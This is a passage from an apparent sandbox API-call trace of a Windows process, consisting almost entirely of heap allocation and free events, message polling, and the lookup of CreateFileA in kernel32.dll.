lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0181.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0181.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0181.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0181.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0181.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0181.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0181.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0181.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0181.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0181.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0181.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0181.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0181.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0181.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0181.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0181.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0181.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0181.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0181.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0181.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0181.400] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0181.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0181.400] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0181.400] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0181.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0181.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0181.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0181.401] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0181.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0181.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0181.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0181.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0181.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0181.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0181.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0181.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0181.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0181.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0181.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0181.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba018 [0181.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0181.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0181.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0181.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0181.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0181.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0181.401] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0181.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0181.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0181.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0181.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0181.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0181.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0181.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0181.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0181.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0181.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0181.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0181.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0181.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0181.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0181.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0181.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0181.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0181.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0181.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0181.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0181.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0181.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0181.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0181.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0181.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0181.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0181.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0181.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0181.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0181.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0181.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0181.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0181.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0181.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0181.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0181.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0181.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0181.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0181.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0181.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0181.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0181.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0181.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0181.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0181.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0181.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0181.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0181.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0181.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0181.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0181.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0181.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0181.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0181.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0181.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0181.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0181.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0181.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0181.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0181.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0181.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0181.405] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0181.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0181.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0181.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0181.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0181.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0181.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0181.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0181.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0181.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0181.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0181.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0181.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0181.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0181.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0181.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0181.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0181.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0181.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0181.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0181.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0181.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0181.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0181.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0181.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0181.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0181.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0181.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0181.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0181.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0181.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0181.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0181.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0181.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0181.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0181.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0181.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0181.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0181.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0181.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0181.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0181.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0181.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0181.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0181.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0181.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0181.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0181.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0181.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0181.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0181.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0181.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0181.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0181.408] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0181.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0181.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0181.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bdae0 [0181.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bdae0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0181.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.409] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0181.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0181.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0181.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0181.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0181.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0181.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0181.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0181.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdae0 [0181.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bdae0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0181.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.409] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0181.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0181.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0181.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 